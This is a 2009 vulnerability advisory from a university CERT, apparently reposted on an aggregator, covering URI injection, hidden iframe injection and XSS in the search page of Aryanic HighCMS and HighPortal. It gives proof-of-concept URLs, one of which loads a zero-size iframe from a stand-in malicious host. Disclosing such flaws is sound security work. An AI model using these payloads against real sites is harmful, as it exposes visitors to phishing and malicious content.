Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21464
HistoryMar 12, 2009 - 12:00 a.m.

Aryanic HighCMS and HighPortal multiple Vulnerabilities

2009-03-1200:00:00
vulners.com
134

================= IUT-CERT =================

Title: Aryanic HighPortal, HighCMS Multiple Vulnerabilities

Vendor: www.aryanic.com
Vulnerable Version: 10 and priors
Type: Input.Validation.Vulnerability (URI Injection, Frame Injection, XSS)
Fix: N/A

================== nsec.ir =================

Description:

    Aryanic is the leading CMS producer in Iran. Search page in HighCMS and HighPortal
    products are vulnerable to multiple input validation vulnerabilities.

Vulnerability Variant:

    1- URI Injection "/web_search.aspx" in "q" parameter.
    http://example.com/includes/web_search.aspx?id=1&q="<a href="http://www.malicious.com">clickme</a>
    
    2- iFrame Injection "/web_search.aspx" in "q" parameter.
    http://example.com/includes/web_search.aspx?id=1&q="iframe src ="http://www.malicious.com" width="0"

height="0"></iframe>

    3- Cross Site Scripting &quot;/web_search.aspx&quot; in &quot;q&quot; parameter.
    http://example.com/includes/web_search.aspx?id=1&amp;q=&quot;&lt;script&gt;alert&#40;12345&#41;&lt;/script&gt;

Solution:

            Input validation of Parameter &quot;q&quot; should be corrected.

Credit:

Isfahan University of Technology - Computer Emergency Response Team
Thanks to : E. Jafari, N.Fathi, M. R. Faghani